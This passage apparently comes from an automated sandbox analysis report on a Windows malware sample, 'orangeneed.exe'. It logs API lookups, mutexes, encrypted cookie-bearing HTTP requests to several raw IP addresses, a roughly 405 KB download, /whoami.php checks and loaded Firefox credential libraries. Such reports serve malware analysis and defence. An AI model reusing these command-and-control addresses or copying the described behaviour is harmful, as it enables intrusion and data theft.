Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineA, address_out = 0x757451a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75744a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x75745235	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x757451b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x75744d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x7576772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x757487c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x7575d802	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x757449ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x757411e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x757414fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x75743587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x757434b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75741282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75744950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x757414e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75747a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x757458a6	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = getnameinfo, address_out = 0x753067b7	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x7530311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 20, address_out = 0x753034b5	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 18, address_out = 0x75306989	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 4, address_out = 0x75306bdd	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 8, address_out = 0x75302d57	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = getaddrinfo, address_out = 0x75304296	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 6, address_out = 0x753030af	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = freeaddrinfo, address_out = 0x75304b1b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 7, address_out = 0x7530737d	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 13, address_out = 0x7530b001	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 1, address_out = 0x753068b6	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = WSAIoctl, address_out = 0x75302fe7	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 23, address_out = 0x75303eb8	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 16, address_out = 0x75306b0e	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 19, address_out = 0x75306f01	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 5, address_out = 0x75307147	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 21, address_out = 0x753041b6	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 2, address_out = 0x75304582	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = WSAGetOverlappedResult, address_out = 0x75307489	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 3, address_out = 0x75303918	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 112, address_out = 0x753037d9	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 10, address_out = 0x75303084	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = WSARecv, address_out = 0x75307089	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = WSASend, address_out = 0x75304406	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 111, address_out = 0x753037ad	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetBestRoute, address_out = 0x74b7ec2e	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetIpAddrTable, address_out = 0x74b79bb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75744f2b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x7574359f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75741252	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75744208	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75744d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x757c410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x757c4195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x7574d31f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x7575ee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x7767441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x7769c50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x7769c381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x7575f088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x776805d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x7769ca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77650b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x7770fde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x776a1e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x757c4761	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x757bcd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x757c424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x757c46b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x757d6676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x757c4751	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x757d65f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x757c47c1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x757c47e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x757c47f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x7575eee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
Create Mapping	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Map	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe, desired_access = FILE_MAP_READ	1	Fn

Service (1)

Operation	Additional Information	Success	Count	Logfile
Open Manager	database_name = SERVICES_ACTIVE_DATABASE		1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	-	class_name = LDWCN705BA84C, wndproc_parameter = 0		1	Fn

System (79)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = YKYD69Q	3	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = Ticks, time = 186561	3	Fn
Get Time	type = Ticks, time = 187575	1	Fn
Get Time	type = Ticks, time = 188589	1	Fn
Get Time	type = Ticks, time = 189603	1	Fn
Get Time	type = Ticks, time = 190617	1	Fn
Get Time	type = Ticks, time = 190633	2	Fn
Get Time	type = Ticks, time = 191631	1	Fn
Get Time	type = Ticks, time = 192645	1	Fn
Get Time	type = Ticks, time = 193659	1	Fn
Get Time	type = Ticks, time = 194673	1	Fn
Get Time	type = Ticks, time = 195687	1	Fn
Get Time	type = Ticks, time = 195921	2	Fn
Get Time	type = Ticks, time = 196701	1	Fn
Get Time	type = Ticks, time = 197715	1	Fn
Get Time	type = Ticks, time = 198729	1	Fn
Get Time	type = Ticks, time = 199743	1	Fn
Get Time	type = Ticks, time = 200757	3	Fn
Get Time	type = Ticks, time = 200835	1	Fn
Get Time	type = Ticks, time = 222597	4	Fn
Get Time	type = Ticks, time = 222675	1	Fn
Get Time	type = Ticks, time = 225983	3	Fn
Get Time	type = System Time, time = 2018-09-07 17:14:14 (UTC)	1	Fn
Get Time	type = Ticks, time = 226622	1	Fn
Get Time	type = Ticks, time = 227184	1	Fn
Get Time	type = Ticks, time = 227730	1	Fn
Get Time	type = Ticks, time = 228198	1	Fn
Get Time	type = Ticks, time = 228759	1	Fn
Get Time	type = Ticks, time = 229212	1	Fn
Get Time	type = Ticks, time = 229758	1	Fn
Get Time	type = Ticks, time = 230226	1	Fn
Get Time	type = Ticks, time = 230756	1	Fn
Get Time	type = Ticks, time = 231240	1	Fn
Get Time	type = Ticks, time = 231755	1	Fn
Get Time	type = Ticks, time = 232254	1	Fn
Get Time	type = Ticks, time = 232753	1	Fn
Get Time	type = Ticks, time = 233268	1	Fn
Get Time	type = Ticks, time = 233751	1	Fn
Get Time	type = Ticks, time = 234282	1	Fn
Get Time	type = Ticks, time = 234750	1	Fn
Get Time	type = Ticks, time = 235296	1	Fn
Get Time	type = Ticks, time = 235748	1	Fn
Get Time	type = Ticks, time = 236310	1	Fn
Get Time	type = Ticks, time = 236747	1	Fn
Get Time	type = Ticks, time = 237324	1	Fn
Get Time	type = Ticks, time = 237761	1	Fn
Get Time	type = Ticks, time = 238338	1	Fn
Get Time	type = Ticks, time = 238759	1	Fn
Get Time	type = Ticks, time = 239352	1	Fn
Get Time	type = Ticks, time = 239757	1	Fn
Get Time	type = Ticks, time = 240366	1	Fn
Get Time	type = Ticks, time = 240756	1	Fn
Get Time	type = Ticks, time = 241380	1	Fn
Get Time	type = Ticks, time = 241754	1	Fn
Get Time	type = Ticks, time = 242394	1	Fn
Get Time	type = Ticks, time = 242753	1	Fn
Get Time	type = Ticks, time = 243408	1	Fn
Get Time	type = Ticks, time = 243751	1	Fn
Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn
Get Info	type = Operating System	3	Fn
Get Info	type = Hardware Information	3	Fn

Mutex (5)

Operation	Additional Information	Count	Logfile
Create	mutex_name = PEM9CC	1	Fn
Create	mutex_name = Global\I705BA84C	1	Fn
Create	mutex_name = Global\M705BA84C	1	Fn
Create	mutex_name = Global\Nx513464FA	1	Fn
Release	mutex_name = Global\I705BA84C	1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data

Network Behavior

DNS (3)

Operation	Additional Information	Success	Count	Logfile
Resolve Name	host = 239.255.255.250, address_out = 239.255.255.250, service = 1900		3	Fn

UDP Sessions (1)

Information	Value
Total Data Sent	402 bytes
Total Data Received	0 bytes
Contacted Host Count	2
Contacted Hosts	239.255.255.250:1900, 239.255.255.250:None

UDP Session #1

Information	Value
Handle	0x364
Address Family	AF_INET
Type	SOCK_DGRAM
Protocol	IPPROTO_UDP
Remote Address	239.255.255.250
Remote Port	-
Local Address	192.168.0.64
Local Port	50069
Data Sent	402 bytes
Data Received	0 bytes

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_UDP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Bind	local_address = 192.168.0.64, local_port = 50069, hint = OS assigned a local port from the dynamic client port range	1	Fn
Send	remote_address = 239.255.255.250, remote_port = 1900, flags = NO_FLAG_SET, size = 137, size_out = 137	1	Fn Data
Send	remote_address = 239.255.255.250, remote_port = 1900, flags = NO_FLAG_SET, size = 132, size_out = 132	1	Fn Data
Send	remote_address = 239.255.255.250, remote_port = 1900, flags = NO_FLAG_SET, size = 133, size_out = 133	1	Fn Data

UDP Server (1)

Operation	Additional Information	Success	Count	Logfile
Bind	local_address = 192.168.0.64, local_port = 50069, hint = OS assigned a local port from the dynamic client port range		1	Fn

HTTP Sessions (5)

Information	Value
Total Data Sent	1.35 KB
Total Data Received	395.77 KB
Contacted Host Count	4
Contacted Hosts	177.242.11.145, 201.132.110.134, 201.170.69.112, 189.212.177.73

HTTP Session #1

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	177.242.11.145
Server Port	8090
Data Sent	341
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = 177.242.11.145, server_port = 8090	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Cookie: 47640=kx+WJmdYVyjV0cPGdlunW3xnucBwRvOOtj2h+Prhr2ZdN5ohfmSC4jbAqjJT64Hhp3QXpsZt4whY8hB0+9v6yOOCHXtVkgN0//aDJIK5Da6O5dHcEUiNiVFJZUosKTLFzWlR6BEhm3JyvFrzXvaS1cYlOHr6wkyy8fP5ghI493xlif2+gY84wMUGQck4dK7s4U8+I6GlujtnhttHhHI76PNuBDbif1o3dC1dkNWVBX0z09zWjDSaUTZerRm1owO04NXT1wRGKGN9SeTk7hWdEBbeDRU5A1QFp4IROJo2McShrzzTL5yEyktdgLA13ufrFwWYdbLJLU7LfElV6l15d6XUfwkfYDmRc96SMszR6Tr8Vg4Xgz9FuFtnDOV8h4nr3NXwgv0gkjc1KYerekJG1OKeo+TaoHqcrBp0K0WjH12vTBVEIJxfFYY32nHB30iyT9xEptqE1TTM07C6rZx+rG/dx2v8fm5vNNkOdz+9LzdwE0SsR2Cpd6+VyYpnZhebC+olSY2BhgqywOq/u1TYO0WxBccJWuKAZMOaU+Pv9IM0UnEJ2NoaC4wsn5GD0StwvXeNybnLImrPqE7asF1U8UHTPirXZYaOTjqLD6Ub4XwWJJOa7Gpxc7Veq7H/I7cMkC1gdRrdCGtN17htyjYHrFbYTJXl6r21lpvmpneu74AwxHP0VAC61DT2A45mEzPy/ZBPbjsMr8O3JHcWicCqG4uYuYQ=, url = 177.242.11.145	1	Fn
Close Session	-	3	Fn

HTTP Session #2

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	201.132.110.134
Server Port	8080
Data Sent	343
Data Received	405100

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = 201.132.110.134, server_port = 8080	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Cookie: 3945=pCA+wFM5Mcr8xDB6X7U+7aZg6VXohsxFeOPov98QcNfi25ET/2IWzExlJ4Oja5gxJJjVHNGU3ioh6oz2kRHe2ZfKvNvEzmYXmR/hErP818MWKnujQ2DB1NNwCmxD255zaYrg0aQtrD9Z5yWzdvxmh9vSpVH5J7CHTZStRdn//IpHC30f3yVYgiYIg0WSUTPLGRDjxpoJ22z7NtLEIZx95tXs6nmNJ1XSOYLOOSCnwQwsjD8zcUqe95y30FDbjT3sUE+jQD74gMhp+v8jQrnS9NifQOz93idzZ1V1chNmAJ5RKeDHhkYiCToYW/SmUQE2jGqRgn144inlWkbeXCGU1C1FN+lHtUX8S8zzrYeQ+lPCoF2FixHbchP5ygl0CZgUP0MXWV1oniBBxXdgaWF8Pwrqf9Y3FfYFgAztVr5T9oHoGdSew80K4TV98ZTbgO3yKBvXLWILXP2dUFh1eX1rcXh42CJrJXkRIQAnxP95E5ONiAWDtimZ8E5rCF8NaMKWBjHXOGwzsAfwIOpjQ6twADbzApy4xrgRHt6akVqDxazoL/wJMUCbkHrJYehJzGnxWb22VWb8uJ5Wfpe9PTXSiEiny0EOOU8px25dI4lXhnCIzJlLd/+diMSmcDr9+MYiklxLCUIRc9danOMKy42q9LTmUuj+PuaT8fv/4RlgKhxL/DHhV0sgvz5tQzSMMUNBRPaQfkFNnu5FUwvyEYtFB4uzpvo=, url = 201.132.110.134	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Read Response	size = 405092, size_out = 405092	1	Fn Data
Close Session	-	3	Fn

HTTP Session #3

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	201.170.69.112
Server Port	80
Data Sent	0
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = 201.170.69.112, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /whoami.php, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Close Session	-	3	Fn

HTTP Session #4

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	189.212.177.73
Server Port	80
Data Sent	356
Data Received	13

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = 189.212.177.73, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /whoami.php, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://189.212.177.73:443/whoami.php	1	Fn
Read Response	size = 64, size_out = 13	1	Fn Data
Close Session	-	3	Fn

HTTP Session #5

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	201.132.110.134
Server Port	8080
Data Sent	343
Data Received	156

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = 201.132.110.134, server_port = 8080	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Cookie: 29502=xpC/v9bmQHURJRDz5ioBn4zu6QQtLMBsZJkxTsI34PAXWn4pmUgOVwcCGcfTJ4mstGNZiWcCk+TIHDszrjqOo74ps045+uLKA/mLone+rmjc5jNohNkFrsiPh48yub8vv010pqkPu8IiMGffcpKSIOBBdmj4rYHM3aISR2FKtkkFVe8UH5zgxG7DCDjC9AGkFG8XQF643EMAIN3Y+1LxX79Vn+3PpD0T0btgKxTgC+nw+cIjJAR7gyYCxwmFDkAU9w/lcJ6aefMYRwiSB2Z/bnXa803CZCjYaf7AJfl6Samo9pRbzVEvXXD8bICkcL5VqGektYOVba87Yuv4oa94pjSWw+x1FPEHBfx8ER1I+3f9vjSnIdom69UP0wsp7rXKIqMkDtjKCMLEpZ143mOe8d7nZwQz61s+ylYbvYnOI1uoBmdsXktm0sCsH75TvVTEVdaUnb1Z1+kVhFJQJ4l/SIpKRDDZgpmYd+F8VsWfUaOOoOFgMmH7jPRf7eDJcNLBPukP+nKVA+vUEiW5BcK20ak9TZXhvfWa8RNNAfO75f0D3Fpcyjq202cY+l23Zkqci4rojevUoYjKWIA3zImnw/NI6MJ/DojDnkGS10oVmEWMPT1pCSf/vXFtic126m0KF2QIg6yNTAPidmq5KCIN72DEjAfUAvEVGbim75jgNPqAJmFti7yqs+mbAmPB6qqoxmVhvFnaBhulR2nOk9B+59gLTZBA/qCbnYeowa6hI28EZiSV, url = 201.132.110.134	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Read Response	size = 148, size_out = 148	1	Fn Data
Close Session	-	1	Fn

Process #9: orangeneed.exe

1133

Information	Value
ID	#9
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe" /scomma "C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:02:45, Reason: Child Process
Unmonitor	End Time: 00:03:10, Reason: Self Terminated
Monitor Duration	00:00:25

OS Process Information

Information	Value
PID	0x314
Parent PID	0x9dc (c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 57C 0x B08

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	r	-
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	r	-
pagefile_0x0000000000220000	0x00220000	0x00220fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	r	-
rsaenh.dll	0x00240000	0x0027bfff	Memory Mapped File	r	-
private_0x0000000000240000	0x00240000	0x0027ffff	Private Memory	rw	-
tzres.dll	0x00280000	0x00280fff	Memory Mapped File	r	-
private_0x0000000000280000	0x00280000	0x0028ffff	Private Memory	rw	-
pagefile_0x0000000000280000	0x00280000	0x00287fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000290000	0x00290000	0x00296fff	Pagefile Backed Memory	r	-
pagefile_0x00000000002a0000	0x002a0000	0x002a1fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000002b0000	0x002b0000	0x002b7fff	Pagefile Backed Memory	rw	-
private_0x00000000002d0000	0x002d0000	0x0034ffff	Private Memory	rw	-
private_0x0000000000350000	0x00350000	0x003cffff	Private Memory	rw	-
428.exe	0x00400000	0x0045dfff	Memory Mapped File	rwx	-
private_0x0000000000460000	0x00460000	0x0055ffff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	rw	-
private_0x0000000000680000	0x00680000	0x0077ffff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x0080ffff	Private Memory	rw	-
pagefile_0x0000000000810000	0x00810000	0x00997fff	Pagefile Backed Memory	r	-
pagefile_0x00000000009a0000	0x009a0000	0x00b20fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000b30000	0x00b30000	0x01f2ffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01f30000	0x021fefff	Memory Mapped File	r	-
private_0x0000000002200000	0x02200000	0x02300fff	Private Memory	rw	-
nss3.dll	0x02200000	0x023b1fff	Memory Mapped File	r	-
private_0x0000000002200000	0x02200000	0x023bffff	Private Memory	rw	-
private_0x0000000002200000	0x02200000	0x022fffff	Private Memory	rw	-
private_0x00000000023b0000	0x023b0000	0x023bffff	Private Memory	rw	-
private_0x00000000023c0000	0x023c0000	0x024bffff	Private Memory	rw	-
private_0x0000000002400000	0x02400000	0x024fffff	Private Memory	rw	-
pagefile_0x0000000002500000	0x02500000	0x028f2fff	Pagefile Backed Memory	r	-
freebl3.dll	0x73ce0000	0x73d2efff	Memory Mapped File	rwx	-
freebl3.dll	0x73d10000	0x73d5efff	Memory Mapped File	rwx	-
softokn3.dll	0x73d30000	0x73d56fff	Memory Mapped File	rwx	-
nssdbm3.dll	0x73d90000	0x73da6fff	Memory Mapped File	rwx	-
softokn3.dll	0x73db0000	0x73dd6fff	Memory Mapped File	rwx	-
